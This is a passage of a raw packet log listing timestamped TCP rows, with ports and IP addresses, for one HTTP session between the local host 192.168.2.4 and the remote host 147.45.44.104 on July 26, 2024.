Jul 26, 2024 18:56:41.486412048 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.486422062 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.486423969 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.486433983 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.486435890 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.486447096 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.486458063 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.486484051 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.487271070 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.487283945 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.487301111 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.487312078 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.487314939 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.487330914 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.487337112 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.487344027 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.487354994 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.487358093 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.487369061 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.487376928 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.487380028 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.487392902 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.487401009 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.487405062 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.487417936 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.487423897 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.487430096 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.487438917 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.487461090 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.488110065 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.488147974 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.488291979 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.488306999 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.488320112 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.488327980 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.488332987 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.488348007 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.488353968 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.488363028 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.488370895 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.488378048 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.488389969 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.488393068 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.488403082 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.488409996 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.488415003 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.488426924 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.488437891 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.488439083 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.488450050 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.488461018 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.488461971 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.488487005 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.488493919 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.489267111 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.489279032 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.489291906 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.489305019 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.489305019 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.489319086 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.489320040 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.489335060 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.489335060 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.489348888 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.489360094 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.489362955 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.489386082 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.489408970 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.513880968 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.513906956 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.513919115 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.513928890 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.513963938 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.513964891 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.514055014 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.514065027 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.514076948 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.514089108 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.514094114 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.514108896 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.514130116 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.516463995 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.516525030 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.516539097 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.516571999 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.516592979 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.516702890 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.516714096 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.516725063 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.516736984 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.516745090 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.516767025 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.517004013 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.517014027 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.517024040 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.517035961 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.517046928 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.517060995 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.517081976 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.518318892 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.518351078 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.518366098 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.518397093 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.518414974 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.518505096 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.518520117 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.518534899 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.518549919 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.518556118 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.518574953 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.518594980 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.518985987 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.519001961 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.519023895 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.519035101 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.589152098 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.589169979 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.589184046 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.589205980 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.589220047 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.589234114 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.589248896 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.589257002 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.589313984 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.589560032 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.589575052 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.589589119 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.589601994 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.589613914 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.589615107 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.589631081 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.589632034 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.589647055 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.589653969 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.589663029 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.589668989 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.589679956 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.589684963 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.589699984 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.589715004 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.590245962 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.590260029 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.590272903 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.590286970 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.590297937 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.590301037 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.590316057 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.590323925 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.590331078 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.590341091 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.590346098 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.590364933 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.590365887 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.590379953 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.590388060 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.590395927 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.590409040 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.590410948 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.590423107 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.590425968 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.590436935 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.590451002 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.590464115 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.592516899 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.592531919 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.592545033 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.592554092 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.592566967 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.592581034 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.592583895 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.592595100 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.592602015 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.592611074 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.592623949 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.592628956 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.592638016 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.592643976 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.592653990 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.592665911 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.592669010 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.592680931 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.592685938 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.592694044 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.592708111 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.592720985 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.593044996 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.593060017 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.593071938 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.593081951 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.593086004 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.593094110 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.593100071 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.593108892 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.593122959 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.593123913 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.593137026 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.593138933 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.593153954 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.593163013 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.593168020 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.593178034 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.593183041 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.593194008 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.593197107 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.593209028 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.593223095 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.593224049 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.593239069 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.593240976 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.593254089 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.593259096 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.593270063 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.593272924 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.593286037 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.593288898 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.593302011 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.593303919 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.593317986 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.593322039 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.593337059 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.593352079 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.593672991 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.593688011 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.593719006 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.593826056 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.593839884 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.593861103 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.593863964 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.593875885 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.593888998 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.593888998 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.593904972 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.593905926 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.593924046 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.593926907 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.593938112 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.593950033 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.593952894 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.593966961 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.593976021 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.593981028 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.593993902 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.593997002 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.594007015 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.594012976 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.594028950 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.594033957 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.594052076 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.594067097 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.594688892 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.594705105 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.594717979 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.594733000 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.594733000 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.594748020 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.594748974 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.594775915 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.594801903 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.612999916 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.613050938 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.613061905 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.613116026 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.613159895 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.613171101 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.613181114 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.613190889 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.613198042 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.613224983 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.613687992 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.613702059 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.613715887 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.613728046 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.613739014 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.613754034 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.613775969 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.613837004 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.613851070 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.613862991 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.613873005 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.613883972 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.613887072 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.613899946 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.613900900 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.613914967 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.613919973 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.613929033 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.613933086 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.613944054 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.613948107 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.613957882 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.613961935 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.613972902 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.613976955 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.613991976 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.613993883 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.614006042 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.614008904 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.614027023 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.614042044 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.614372969 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.614393950 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.614407063 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.614419937 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.614429951 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.614454985 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.678024054 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.678029060 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.678150892 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.678165913 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.678180933 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.678201914 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.678201914 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.678216934 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.678229094 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.678246975 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.678268909 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.678580046 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.678591967 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.678603888 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.678616047 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.678637028 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.678653955 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.678904057 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.678915977 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.678925991 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.678936958 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.678941965 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.678951025 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.678962946 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.678967953 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.678988934 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.679383993 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.679394960 CEST	80	49757	147.45.44.104	192.168.2.4
